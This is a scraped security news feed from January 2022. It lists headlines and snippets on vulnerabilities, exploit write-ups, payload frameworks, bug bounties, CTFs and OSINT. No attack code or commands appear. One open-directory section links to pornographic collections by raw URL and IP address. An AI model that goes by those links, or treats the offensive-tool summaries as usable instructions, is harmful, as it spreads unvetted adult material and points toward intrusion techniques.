    Gartner 2021 漏洞评估产品市场指南 by ourren 网安新兴赛道及厂商速查· Cyber Security Billboard by ourren 网络空间测绘溯源技术剖析 by ourren 网络空间威胁狩猎的研究综述 by ourren 长安"战疫"-WriteUp by ourren APT组织情报研究年鉴 2021 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-12 Review
    Gartner 2021 漏洞评估产品市场指南 by ourren 网安新兴赛道及厂商速查· Cyber Security Billboard by ourren 网络空间测绘溯源技术剖析 by ourren 网络空间威胁狩猎的研究综述 by ourren 长安"战疫"-WriteUp by ourren APT组织情报研究年鉴 2021 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Preventing Broken Access Control: The No.1 OWASP Vulnerability in 2021
    Article URL: https://www.synack.com/blog/preventing-broken-access-control-the-no-1-vulnerability-in-the-owasp-top-10-2021/ Comments URL: https://news.ycombinator.com/item?id=29908197 Points: 3 # Comments: 0  ( 6 min )
  • Open

    FreeBuf早报 | 欧盟将启动供应链安全大规模演练;特斯拉汽车软件被曝安全缺陷
    一名安全研究人员表示,部分特斯拉汽车软件存在“严重”缺陷,该缺陷能够远程解锁车辆门窗、在无钥匙状态下启动车辆并禁用安全系统。  ( 1 min )
    等保2.0测评安全计算环境GaussdDB过程指南(华为高斯数据库)
    一次华为私有云的高斯数据库测评指南  ( 1 min )
    中小企业容易成为网络攻击的目标
    51%的中小企业经历过网络安全漏洞,由此带来的网络犯罪成为了亟待解决的问题。
    长城汽车诚聘多名安全人才
    长城汽车是成立于1984年的中国汽车品牌,诚聘多位安全人才。  ( 1 min )
    密码技术在个人信息合规中的应用与落地
    个人信息合规落地,尤其是个人信息的安全保障义务,不仅仅是法律问题,更是信息安全技术问题。  ( 1 min )
    RedLine 信息窃取器的新变种!伪装成Omicron 病例计数器传播
    RedLine 的目标是存储在浏览器上的用户账户凭证等信息。  ( 1 min )
    斗象PRS-NTA通过华为鲲鹏 920兼容性认证
    坚持信创,斗象科技不断深化国产化生态合作。
    安卓版Firefox Focus浏览器增强了隐私保护,阻止跨站点跟踪
    安卓版火狐Focus浏览器进一步强化了隐私保护功能,可防止cookie 被用于广告和分析用户行为,以此来保护用户在浏览内容时免受跨站点跟踪。  ( 1 min )
    常见的加密方式实例
    通常在我们测逻辑漏洞或写爬虫的时候,如果遇到前端加密,我们可以选择将加密算法拖出来,对自己调试的参数进行加密。  ( 10 min )
    微软:powerdir 漏洞允许访问macOS用户数据
    微软发布消息称,威胁行为者可以利用 macOS 漏洞绕过透明,同意和控制(TCC)框架来访问用户受保护的数据。  ( 1 min )
    工业网络靶场漫谈(七)|发展趋势展望
    数字化转型正在加速推动OT与IT的融合发展,与此同时OT与IT融合的网络安全风险也同步演进发展。  ( 1 min )
    黑客用漏洞清除债务 这种漏洞如何“早知道”
    利用漏洞清除债务,盗取数据,一键获取XX游戏的所有账户登陆权限,这些看似爽文里的“骚操作”其实早就在现实中上演。  ( 1 min )
  • Open

    How to attack Offensive Security Web Expert (OSWE)
    In this article, we will discuss about one of the toughest exams from Offensive Security, the web expert one (OSWE). Continue reading on Medium »
    Bug Bounty Methodology — Horizontal Enumeration
    While performing a security assessment our main goal is to map out all the domains owned by a single entity. This means knowing all the… Continue reading on Medium »  ( 3 min )
    Xiaomi Arbitrary JavaScript Vulnerability
    I’m glad you’re here. Please have fun reading (nmochea). Continue reading on Medium »  ( 1 min )
    learning prerequisites for hacking and bug bounty?
    hey computer geeks. i am writing this cause i have faced very problems in getting started in “cyber security” cause of i don’t know where… Continue reading on Medium »  ( 3 min )
    Attacking ARP: Learn Networking By Breaking Stuff For Bug Bounty Hunters, Penetration Testers, and…
    An introduction to the fundamentals of one of the most important protocols on the internet and the methodology to exploit it for fun and… Continue reading on Dev Genius »  ( 5 min )
    Subdomain Enumeration — The Right way (Prerequisites)
    So, I have seen various articles about subdomain enumeration and decided to make one in detail without confusing everyone with various… Continue reading on Medium »  ( 3 min )
  • Open

    Friend Request Flow Exposes User Data
    Zenly disclosed a bug submitted by yetanotherhacker: https://hackerone.com/reports/1245741 - Bounty: $750
    Account Takeover via SMS Authentication Flow
    Zenly disclosed a bug submitted by yetanotherhacker: https://hackerone.com/reports/1245762 - Bounty: $1750
    CSRF to change password
    Nord Security disclosed a bug submitted by paramdham: https://hackerone.com/reports/204703 - Bounty: $300
    Clickjacking to change email address
    Gener8 disclosed a bug submitted by paramdham: https://hackerone.com/reports/783191

  • Open

    CyberDefenders | L’espion
    The OSINT write-ups Continue reading on InfoSec Write-ups »  ( 3 min )
    What is OSINT
    Have you been trying to find someone online, specifically perhaps by using an email addresses, or username? Continue reading on Medium »  ( 7 min )
    Using fitness tracker apps for OSINT purposes
    The smartwatches and fitness trackers we wear know a myriad of information about us… From the places we visit, our coordinates, our health… Continue reading on Medium »  ( 5 min )
    OSINT: Open Source Intelligence
    If you’ve heard the name but are wondering what it means, OSINT stands for open source intelligence, which refers to any information that… Continue reading on Medium »  ( 3 min )
    OSINT: Open Source Intelligence
    If you’ve heard the name but are wondering what it means, OSINT stands for open source intelligence, which refers to any information that… Continue reading on Medium »  ( 3 min )
  • Open

    CVE-2021-45608 – NetUSB RCE Flaw in Millions of End User Routers
    Article URL: https://www.sentinelone.com/labs/cve-2021-45608-netusb-rce-flaw-in-millions-of-end-user-routers/ Comments URL: https://news.ycombinator.com/item?id=29897289 Points: 3 # Comments: 0  ( 6 min )
    Windows HTTP Protocol Stack RCE Vulnerability (CVE-2022-21907)
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907 Comments URL: https://news.ycombinator.com/item?id=29896565 Points: 3 # Comments: 2
    Writing an Exploit for CVE-2021-20038 (SonicWall SSL VPN)
    Article URL: https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038 Comments URL: https://news.ycombinator.com/item?id=29891670 Points: 1 # Comments: 0  ( 24 min )
  • Open

    Windows HTTP Protocol Stack RCE Vulnerability (CVE-2022-21907)
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907 Comments URL: https://news.ycombinator.com/item?id=29896565 Points: 3 # Comments: 2
  • Open

    Finding vulnerabiities in LoRaWAN's Protocol Stacks: Emulation with Qiling/Unicorn, P-Code emulation with Ghidra and AFL++ Fuzzing (Quick summary + complete 40 pages paper)
    submitted by /u/sebazzen [link] [comments]  ( 1 min )
    How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more.
    submitted by /u/jat0369 [link] [comments]
    Risk-aware applications
    submitted by /u/TolgaDevSec [link] [comments]
    Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory. Ivy’s loader does this by utilizing programmatical access in the VBA object environment to load, decrypt and execute shellcode.
    submitted by /u/tylous [link] [comments]  ( 1 min )
    CVE-2021-41577: MITM to RCE in EVGA Precision X1
    submitted by /u/hackers_and_builders [link] [comments]  ( 1 min )
    Writing an Exploit for CVE-2021-20038 (SonicWall SSL VPN)
    submitted by /u/chicksdigthelongrun [link] [comments]
    Domain Escalation - ShadowCoerce [MS-FSRVP]
    submitted by /u/netbiosX [link] [comments]
  • Open

    How I downed acronis.com in 2 minutes — Lucky bug write up
    Hi bug hunters!! Continue reading on Medium »  ( 1 min )
    Linux Privilege Escalation Resources
    hey, guys, ’s I hope you doing well. Today I share some Linux priv esc resources That help you in solving CTF and in web-pentesting and… Continue reading on Medium »  ( 1 min )
    ODDZ Incentivized Testnet : Airdrop And Bug Bounty Program
    Oddz Finance’s Options V1 Already Live On Binance Smart Chain Mainnet And Completed Testnet On Polygon Matic Chain. Continue reading on Medium »  ( 1 min )
    COOKIES: AN EYE-OPENING GUIDE
    Cookies are tiny pieces of data or information that are locally stored on your computer that are sent to the server when you make a request Continue reading on Medium »  ( 2 min )
    COOKIES: AN EYE-OPENING GUIDE
    Cookies are tiny pieces of data or information that are locally stored on your computer that are sent to the server when you make a request Continue reading on Medium »  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control Continue reading on InfoSec Write-ups »  ( 2 min )
    Mintverse Beta 2.0 Bug Bounty Program
    Dear Mintverse community, Continue reading on Mintverse »  ( 2 min )
    Bug Bounty Methodology - Web Vulnerabilities Checklist
    Hello guys, it’s me again. I know malware analysis might be boring because of debugging and code analysis especially for the people who… Continue reading on Medium »  ( 2 min )
    Starting My Journey
    Hi Welcome to Bug University, I welcome you all to my blog site… Continue reading on Medium »
    My Pentest Log -1 -
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Admin Login Bypass in a Coaching system
    Hello readers I am Aditya , Recently hunting around in a coaching site I found a critical bug at… Continue reading on Medium »  ( 1 min )
  • Open

    Red Team vs Blue Team: entenda a diferença
    Como em um time de futebol, temos o ataque e a defesa, em cibersegurança a ideia é parecida. Continue reading on Yaman Tecnologia »  ( 2 min )
    OFFENSIVE SECURITY TOOLS FOR PENTESTING & RED TEAM OPERATIONS
    Every so often I post a tweet on Twitter asking for people’s arsenal of different tools whether for security, coding or whatever. Continue reading on Medium »  ( 1 min )
  • Open

    Prototype pollution via console.table properties
    Node.js disclosed a bug submitted by rugvip: https://hackerone.com/reports/1431042
  • Open

    Kernel ROP gadgets ARM
    Hello guys, I am trying to port a kernel exploit and i need to find rop gadgets from vmlinux. This is not accessible in the target and as far as i understand uboot loads the vmlinux on boot, but this restricts me from easily finding the gadgets i need. Is there any resource you can suggest as I'm clearly missing something and my resesrch till now didn't give me clear answers. Thanks :D submitted by /u/Cr0wTom [link] [comments]  ( 1 min )
    Wfuzz VS ffuf - Which one is the faster web fuzzing tool? [Web Security #1]
    submitted by /u/pat_ventuzelo [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-11 Review
    基于跨站跳转和文本数据异构图的GCN模型实现恶意网站识别 by ourren 在互联网交换中心检测反射放大 DDoS 攻击 by Avenger 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-11 Review
    基于跨站跳转和文本数据异构图的GCN模型实现恶意网站识别 by ourren 在互联网交换中心检测反射放大 DDoS 攻击 by Avenger 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Career growth and related certification
    I've been working as a security tester (pentester) for about a year. I've done CEH V10 and this year I really want to be improved bling on my resume tbh. I am currently doing web mobile pos testing. Your help would be really appreciated in suggesting good value for money and information certificates. I know OSCP is there but I need more hands on for that which I am working on but in the mean time don't want to lose time. I have a potential interest in cloud security but also open to other fields and certification. submitted by /u/light_striker12 [link] [comments]  ( 2 min )
    Tips for making malware lab for school project
    Going to use https://github.com/ytisf/theZoo malwares. Maybe use Splunk to write alerts, queries etc to identify the malwares. (Problem is that it only got 60 days trial, need at least for 6 months) Should I be worried for VM escape, if I run these malware in a secure VM environment? What should be the main focus of this project. Run the malware then just identify them with alerts and write writeups? Would this idea be great for a university project for 6 months? submitted by /u/PapiPoseidon [link] [comments]  ( 3 min )
    Strange log activity
    Has anyone ever seen windows event 1102 (The audit log was cleared) activity on a windows server that was performed by SYSTEM? It happened on a test vm I built and I can't figure out why that would happen. I have backups of the logs and compared the logs on the server with the backup and a few 100 logs were deleted but they were future dated logs (which doesn't make sense). I'm sure the it's not a timezone issue, the logs were dated 15 hours into the future. Almost like they were a mistake and the system fixed it? I have basically nothing running on the server (something I built for testing) but would love to understand what happened. Thanks! submitted by /u/forthebeer2000 [link] [comments]  ( 1 min )
    How to remove root certificates from work
    I recently started a new job at a government facility with a BYOD policy at work. Without thinking, I used my personal phone and logged in to the wifi which required me to accept root certificates. I am now aware that all my traffic can be decrypted and anything on my personal phone can be monitored on any network. I wish to keep my personal privacy and use a separate device for work now. How can I reset my phone to remove the root certificates? As I understand it, a standard factory reset may not work if the cert provided superuser permissions. Would a stock ROM install remove the root cert? submitted by /u/lloptty774 [link] [comments]  ( 1 min )
  • Open

    Invicti Security Names Jeff Bray Chief Financial Officer
    Invicti Security today announced seasoned financial executive Jeff Bray has joined the company as Chief Financial Officer. Bray brings decades of experience leading world-class finance teams in both private and public software companies and will lead all aspects of Invicti’s financial operations. READ MORE  ( 2 min )
  • Open

    Real or Fake? How to Spoof Email
    I briefly mentioned how easy it is to forge email sender addresses in a previous blog post that described the steps I took to determine whether a suspicious email was legitimate or a phishing attempt. In this post, we will take a deeper dive into why email sender addresses are so easy to forge and... The post Real or Fake? How to Spoof Email appeared first on TrustedSec.  ( 14 min )
  • Open

    Domain Escalation - ShadowCoerce [MS-FSRVP]
    submitted by /u/netbiosX [link] [comments]
    Generating & Analyzing Shellcode with Radare2
    submitted by /u/DLLCoolJ [link] [comments]  ( 1 min )
  • Open

    关于我学渗透的那档子事之Java反序列化-CB链
    这篇文章严格来说是我学java利用链的部分学习笔记。  ( 1 min )
    一篇关于PHP反序列化的文章
    一篇关于php反序列的文章  ( 1 min )
    FreeBuf 早报 | 多名 EA Sports FIFA 22玩家被黑;电子垃圾也是网络安全问题
    几名EA Sports FIFA 22的玩家疑似遭受黑客攻击,声称失去了对其个人EA和电子邮件账户的访问权限。  ( 1 min )
    专访阿里云SASE负责人:让办公安全更简单
    SASE是否真能实现Gartner预测的“可取代现有的网络和安全模型”,阿里云SASE是如何打造的,又能为企业带来哪些改变?  ( 1 min )
    欧洲刑警组织被勒令删除与犯罪调查无关的数据
    1月3日,欧洲数据保护监督机构要求欧洲刑警组织删除所存储的与刑事调查无显著关联的大量个人数据信息。
    多名EA Sports FIFA 22玩家被攻击
    越来越多的EA Sports FIFA 22玩家报告称他们的 EA 帐户被黑,无法访问他们的个人EA和电子邮件帐户,其中包括知名主播。  ( 1 min )
    Facebook推出“隐私中心”,教育用户了解数据收集和隐私选项
    迷宫般的菜单和晦涩的措辞,使人们不得不怀疑其在用户数据保护方面的有效性。  ( 1 min )
    “免疫”与“病毒”在网络时空之下的博弈对抗
    网络风险与“零号病人”同样,都是动态的研究课题,没那么容易一击即中,需要在寻找、判断、肯定、和自我否定中循序渐进,就是对“病毒”的认知过程。
    “脆弱”的车联网
    和快速奔跑的车联网产业相比,车联网安全显然是一个水磨工夫的活,车企必须学会慢下来,沉下去,方能真正解决车联网的安全问题。  ( 1 min )
    2021年挖矿木马趋势报告
    深信服威胁情报团队基于云端数据持续对活跃挖矿木马家族进行追踪,检测到了多起挖矿木马爆发事件,并从中分析总结出了一些挖矿木挖马的发展趋势。  ( 1 min )
    从我国现有法律法规谈重要数据定义
    2021年结束了,年底回忆了一下这一年来自己做了些什么,印象最深的应该就是数据安全这个词。  ( 1 min )
  • Open

    My Pentest Log -1 -
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
  • Open

    My Pentest Log -1 -
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
  • Open

    InCTF pro finals 2021: Look deeper writeup
    Hello Hackers!!! I am back with another forensic write-up this time. InCTF professionals finals 2021 happened this week. Challenges were…  ( 3 min )
    [Day 1] Web Exploitation Save The Gifts | Advent of Cyber 3 (2021)
    Very excited for Advent of Cyber 3, because I have trouble with Advent of Cyber 2, lol.  ( 2 min )
    Make a USB Rubber Ducky with less than $3
    USB Rubber Ducky is like USB flash drive, but it’s different. Because it will inject keystrokes with some payload to hack your computer…  ( 3 min )
    Log4j Exploitation Walkthrough(CVE-2021–44228) — INE Labs
    Software developers use the Log4j framework to record user activity and the behavior of applications for subsequent review. Here is how…  ( 3 min )
    Day 8 CN- TCP/UDP #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    InCTF pro finals 2021: Look deeper writeup
    Hello Hackers!!! I am back with another forensic write-up this time. InCTF professionals finals 2021 happened this week. Challenges were…  ( 3 min )
    [Day 1] Web Exploitation Save The Gifts | Advent of Cyber 3 (2021)
    Very excited for Advent of Cyber 3, because I have trouble with Advent of Cyber 2, lol.  ( 2 min )
    Make a USB Rubber Ducky with less than $3
    USB Rubber Ducky is like USB flash drive, but it’s different. Because it will inject keystrokes with some payload to hack your computer…  ( 3 min )
    Log4j Exploitation Walkthrough(CVE-2021–44228) — INE Labs
    Software developers use the Log4j framework to record user activity and the behavior of applications for subsequent review. Here is how…  ( 3 min )
    Day 8 CN- TCP/UDP #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    InCTF pro finals 2021: Look deeper writeup
    Hello Hackers!!! I am back with another forensic write-up this time. InCTF professionals finals 2021 happened this week. Challenges were…  ( 3 min )
    [Day 1] Web Exploitation Save The Gifts | Advent of Cyber 3 (2021)
    Very excited for Advent of Cyber 3, because I have trouble with Advent of Cyber 2, lol.  ( 2 min )
    Make a USB Rubber Ducky with less than $3
    USB Rubber Ducky is like USB flash drive, but it’s different. Because it will inject keystrokes with some payload to hack your computer…  ( 3 min )
    Log4j Exploitation Walkthrough(CVE-2021–44228) — INE Labs
    Software developers use the Log4j framework to record user activity and the behavior of applications for subsequent review. Here is how…  ( 3 min )
    Day 8 CN- TCP/UDP #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    Lot Of IT-Related Books.
    https://doc.lagout.org/ submitted by /u/AdministrativeDig391 [link] [comments]  ( 1 min )

  • Open

    Trying to find a way to see when a user account that is now deleted, was first created. Is that possible?
    So the HDD , which ran XP, doesn’t boot anymore. I can access the files however. I’m trying to find a when a specific account was created on this drive. It was created from the original admin account , which also was deleted and replaced later on. . The user account files of the first admin account were saved , but nothing of the account that I’m looking for. The guest account is still the same guest account with files from when it used to be mine. So it wasn’t factory reset or anything. Am I out of luck for figuring out when the deleted account I’m looking for was created? submitted by /u/Pubh12 [link] [comments]  ( 2 min )
    Deleted texts in an iTunes backup
    Hi all, I believe I already know the answer to a hypothetical scenario but I wanted some clarity on deleted texts via an iTunes backup. From a general perspective, say a user has a modern iPhone and deleted hundreds of text messages then backed up their iPhone using iTunes. Would some or even most of those deleted texts be found in the backup? I realize time and usage of the iPhone would effect what may get backed up, but let’s say they deleted a bunch of texts then created the iTunes backup right after. I imagine since the entire sms.db is getting backed up, the texts marked for deletion would still reside in the database / get backed up. Thanks in advance. submitted by /u/hotsausce01 [link] [comments]  ( 2 min )
  • Open

    Active Directory Privilege Escalation (CVE-2021–42278)
    This post discusses how CVE-2021-42287 allows potential attackers to gain high privileged user access (domain controllers Administrator level access) via a low privileged user (any The post Active Directory Privilege Escalation (CVE-2021–42278) appeared first on Hacking Articles.  ( 4 min )
  • Open

    Active Directory Privilege Escalation (CVE-2021–42278)
    This post discusses how CVE-2021-42287 allows potential attackers to gain high privileged user access (domain controllers Administrator level access) via a low privileged user (any The post Active Directory Privilege Escalation (CVE-2021–42278) appeared first on Hacking Articles.  ( 4 min )
  • Open

    What is an SS7 attack and how does it work?
    I made the post about the IMSI Catchers and someone brought this up. submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
    I clicked a phishing scam link.. can I get rid of the program it downloaded on my iPhone?
    I clicked a link in a text it downloaded something on my phone that I can’t find. My iPhone can’t make calls now.. I double clicked my home button during a call and something glitched.. I saw an app open that is not showing on my phone, it was transparent and said “screen sharing”. I wasn’t able to go into the app then it disappeared. I’m 99% sure someone can see everything I do on my iPhone. Do I need to go to T-Mobile and get a new phone? Edit: every time I make a call it fails and the speaker/audio button is always not able to be selected. But the speaker button will turn on then call fails. Here is a picture of the screen sharing: https://imgur.com/a/HjsY767 submitted by /u/Acrobatic-Path2242 [link] [comments]  ( 2 min )
    remote network pentest connectivity
    Hello Netsec engineers, ​ I have an 'internal' remote pentest coming up for a client who doesn't have a spare computer in their office or a virtual computer. They would like to simulate an attack as if someone walked into the office and dropped a raspberry pi. ​ I have a laptop ready for deployment that will be connected via lan in the clients office, what would be the best way for me to remote into the laptop? In the past I've used Team viewer but that hasnt been great display wise, the reliability never dropped though which is the most important. ​ Would it be worth getting a VPS and configuring my own VPN using openvpn for tests like this? submitted by /u/HotHeadStayingCold [link] [comments]  ( 4 min )
    SANS SEC560 (Network Penetration Testing and Ethical Hacking) Preparation?
    My job is offering to pay for a SANS training of my choice. I passed the SEC401 earlier this year but I have no experience with penetration testing or anything of the sort. I realize I'll have to fill some information gaps myself to get the most out of this course. Where should I start? Thanks in advance. submitted by /u/Lorian-onii-chan [link] [comments]  ( 1 min )
    Another Microsoft account has established ownership of number message?
    got this message was I hacked? or is there something I am missing Another Microsoft account has established ownership of 12176. If you no longer own 121176, we can help you set up another sign-in name the next time you sign in to your Microsoft account. If 12176 still belongs to you, we can help you reclaim it. I cut out the number just in case I actually had this number at one point but what does this mean. I already suspect my brother is behind this because we are at war and he has accessed my Gmail constantly, and I just removed a few devices from my Gmail because it said I had a MacBook which I don't and he's in the IT field, and has google nest in our house he bought for our mother I'm thinking he's manipulating that to steal my credentials as well but I'm not sure. So long story short I cleaned up all possible security breaches my chump brother might have had control over and this happens I'm thinking he was on my Microsoft account because he jumps in my online COD Lobbys with lame attempts to insult me lol submitted by /u/TheGoodJosh [link] [comments]  ( 1 min )
    Best way to inspect IoT device traffic?
    I also suppose the biggest challenge would be getting the devices to trust a self signed certificate. submitted by /u/earthlyaeon [link] [comments]  ( 1 min )
  • Open

    Another MSX directory.
    http://www.msxarchive.nl/pub/msx/ submitted by /u/EmuAnon34 [link] [comments]
    micro bikini oil dance collection
    http://www.wo-fd.xyz/?/Microbikini%20Oily%20Dance%20Ultimate%20Collection%20%5BOmega%20P%5D/ ​ And a butt load more xxx up 1 directory https://preview.redd.it/446vp7vpkta81.png?width=1920&format=png&auto=webp&s=964e053e72ab80490463e4acdb150f24b59acfec submitted by /u/Hyp3rionX [link] [comments]
    xxx od
    http://107.178.111.146:9999/ gay porn submitted by /u/Hyp3rionX [link] [comments]
  • Open

    Abusing terminal emulators with ANSI escape characters can lead to remote DDoS, character injection and more.
    submitted by /u/jat0369 [link] [comments]  ( 1 min )
    Domain Escalation – sAMAccountName Spoofing
    submitted by /u/netbiosX [link] [comments]
    ProtonVPN TCP Accleration SYN+ACK Spoofing Analysis
    submitted by /u/netsecfriends [link] [comments]  ( 2 min )
  • Open

    Domain Escalation – sAMAccountName Spoofing
    submitted by /u/netbiosX [link] [comments]
    Must-Have Tools For Hacking
    submitted by /u/banginpadr [link] [comments]
  • Open

    FTC Says Fix Log4j Security Vulnerability or Face Its Wrath
    Article URL: https://thenewstack.io/ftc-says-fix-log4j-security-vulnerability-or-face-its-wrath/ Comments URL: https://news.ycombinator.com/item?id=29879106 Points: 3 # Comments: 0
    New macOS vulnerability, “powerdir,” could lead to unauthorized user data access
    Article URL: https://www.microsoft.com/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/ Comments URL: https://news.ycombinator.com/item?id=29879030 Points: 5 # Comments: 0  ( 11 min )
  • Open

    Chrome 98 Beta: Color Gradient Vector Fonts, Region Capture Origin Trial, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 98 is beta as of January 10, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android.  COLRv1 Color Gradient Vector Fonts In this version Chrome supports COLRv1 color gradient vector fonts as an additional new font format. A color font contains glyphs with multiple colors in them, which can be for example an emoji or a country flag or a multi-colored letter. COLRv1 is an evolution of the COLRv0 font format intended to make color fonts widespread on the web. COLRv1 fonts bring expressive visua…
  • Open

    OSINT Challenge — find the mural
    I have stumbled upon the Twitter account of OSINTDojo and their challenge to find a certain mural along with the respective artist… Continue reading on Medium »  ( 2 min )
    TryHackMe — OhSINT Walkthrough
    OhSINT is a free room on the TryHackMe platform. The objective of this challenge is to use open-source intelligence techniques to obtain… Continue reading on Medium »  ( 2 min )
  • Open

    FTC words of warning: Remediate recent Log4j vulnerabilities or face consequences
    The FTC has issued a warning to companies straggling behind on Log4j: remediate this flaw or face legal consequences. Here’s what you need to know. READ MORE  ( 3 min )
  • Open

    SecWiki News 2022-01-10 Review
    SecWiki周刊(第410期) by ourren Rootkit 系列研究-Windows平台的高隐匿、高持久化威胁 by ourren 2021年侵犯个人信息十大典型案例 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-10 Review
    SecWiki周刊(第410期) by ourren Rootkit 系列研究-Windows平台的高隐匿、高持久化威胁 by ourren 2021年侵犯个人信息十大典型案例 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    「网安知识大陆」1.0正式上线!
    能将优质内容聚集成一站式的「网安知识大陆」1.0正式版应运而生。
    FreeBuf早报 | 公安部公布个人信息犯罪十大典型案例;Facebook 推出隐私中心
    全国公安机关全年共破获侵犯公民个人信息案件9800余起,抓获犯罪嫌疑人1.7万名,并公布了2021年侵犯公民个人信息犯罪十大典型案例。  ( 1 min )
    实战SNMP服务攻击
    交换机安全配置中的SNMP服务  ( 1 min )
    「收藏版」大盘点:2021年政策法规、国标、报告白皮书
    本文全面整理了2021年出台的国内主要政策法规、部分国家标准以及主要机构的研究报告、白皮书等。  ( 1 min )
    漫话:等级保护之三员管理
    系统管理员、审计管理员、安全管理员不能集于一人之身,最好是三人分别担任。
    《上海市反间谍安全防范条例》发布,2022年1月1日正式施行
    《上海市反间谍安全防范条例》共七章三十五条,进一步完善了反间谍安全防范法律体系,依法维护国家安全。
    Night Sky,一种针对企业的新型勒索软件
    近日,安全研究人员发布警告称,一个名为“Night Sky”的新型勒索软件正再活跃,它以企业网络为目标,并在双重勒索攻击中窃取数据。  ( 1 min )
    在线预订服务平台 FlexBooker超370万账户数据遭泄露
    FlexBooker 建议用户保持警惕,并审查账户报表和信用报告中的可疑交易。  ( 1 min )
    Gin-Vue-admin垂直越权漏洞与代码分析-CVE-2022-21660
    用户之所以有机会越权,最终还是在代码上存在逻辑问题。  ( 3 min )
    因违反隐私规则,法国向谷歌和脸书开出2.1亿欧元巨额罚单
    法国分别对Facebook和谷歌处以1.5亿欧元和6000万欧元的罚款,理由是它们没有向用户提供拒绝cookie跟踪技术的简单选项。  ( 1 min )
    逆向分析教程(三)——快速查找指定代码的四种方法
    调试代码的时候,main()函数并不是直接位于可执行文件的EP位置上,出现在此的是开发工具(Visual C++)生成的启动函数。  ( 1 min )
    逆向分析教程(一)——调试代码
    该系列文章以准备入门逆向的小伙伴为对象进行总结。快来一起学习吧!  ( 1 min )
  • Open

    Domain Escalation – sAMAccountName Spoofing
    Computer accounts have the $ sign appended at the end of their names in contrast with standard user accounts. By default Microsoft operating systems lack… Continue reading → Domain Escalation – sAMAccountName Spoofing  ( 9 min )
    Domain Escalation – sAMAccountName Spoofing
    Computer accounts have the $ sign appended at the end of their names in contrast with standard user accounts. By default Microsoft operating systems lack… Continue reading → Domain Escalation – sAMAccountName Spoofing  ( 9 min )
  • Open

    Domain Escalation – sAMAccountName Spoofing
    Computer accounts have the $ sign appended at the end of their names in contrast with standard user accounts. By default Microsoft operating systems lack… Continue reading → Domain Escalation – sAMAccountName Spoofing  ( 9 min )
    Domain Escalation – sAMAccountName Spoofing
    Computer accounts have the $ sign appended at the end of their names in contrast with standard user accounts. By default Microsoft operating systems lack… Continue reading → Domain Escalation – sAMAccountName Spoofing  ( 9 min )
  • Open

    CTF Write-Up: StackOverflow
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi,  ( 2 min )
    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guys are doing well, Here is the story of how I am able to crash anyone’s Mozilla firefox by just sending a single email…  ( 2 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time.  ( 3 min )
    Day5 CN-Subnetting #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    CTF Write-Up: StackOverflow
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi,  ( 2 min )
    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guys are doing well, Here is the story of how I am able to crash anyone’s Mozilla firefox by just sending a single email…  ( 2 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time.  ( 3 min )
    Day5 CN-Subnetting #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    CTF Write-Up: StackOverflow
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi,  ( 2 min )
    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guys are doing well, Here is the story of how I am able to crash anyone’s Mozilla firefox by just sending a single email…  ( 2 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time.  ( 3 min )
    Day5 CN-Subnetting #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    Exploiting Execute After Redirect (EAR) vulnerability in HTB Previse
    Exploiting Execute After Redirect for fun and profit?? Continue reading on InfoSec Write-ups »  ( 2 min )

  • Open

    searchsploit vs msfconsole exploit names
